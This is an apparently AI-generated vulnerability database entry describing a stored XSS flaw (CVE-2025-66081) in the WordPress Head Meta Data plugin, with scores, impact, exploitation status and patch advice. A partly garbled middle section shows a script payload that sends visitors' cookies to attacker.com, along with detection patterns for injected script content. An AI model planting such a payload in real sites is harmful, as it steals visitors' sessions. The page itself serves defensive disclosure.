
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-66081 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress Head Meta Data plugin by Jeff Starr. It affects all versions up to and including 20250327, and was patched in version 20251118. The vulnerability was reported by researcher Jitlada on November 14, 2025, and publicly disclosed on December 14, 2025. It carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, and 5.9 (Medium) per Patchstack (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An attacker with Author-level or higher privileges can inject malicious scripts into meta data fields managed by the plugin; these scripts are then stored in the database and rendered in the HTML output of affected pages, executing in the browsers of site visitors. Exploitation requires no special configuration beyond having a contributor or author account on the target WordPress site, and user interaction is required on the victim's side for the payload to execute (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site's head meta data, which executes in the browsers of any visitor viewing affected pages. This can lead to session hijacking, credential theft, malicious redirects, defacement, or delivery of drive-by malware to site visitors. The confidentiality and integrity impacts are low-to-moderate, with no direct availability impact; however, the persistent nature of the payload means all site visitors are at risk until the malicious content is removed (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-66081. The EPSS score is approximately 0.034% (0.000340), indicating a very low probability of exploitation in the near term. Patchstack rates this as low priority and notes it is unlikely to be exploited, though it acknowledges that XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable meta data field.<script>, onerror=, javascript:, base64-encoded strings) stored in WordPress post meta or options table entries associated with the Head Meta Data plugin.wp_options or wp_postmeta tables for injected script content.The vendor has released a patched version of the Head Meta Data plugin: version 20251118. All site administrators running version 20250327 or earlier should update immediately via the WordPress plugin dashboard or by downloading the latest release. If an immediate update is not possible, consider temporarily deactivating the plugin and restricting Author/Editor-level access to trusted users only. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).
The vulnerability was covered in Wordfence's weekly WordPress vulnerability report for December 8–14, 2025, as part of routine plugin security tracking. Patchstack, which coordinated the disclosure, rates the issue as low priority with no impactful threat. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability database entries.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."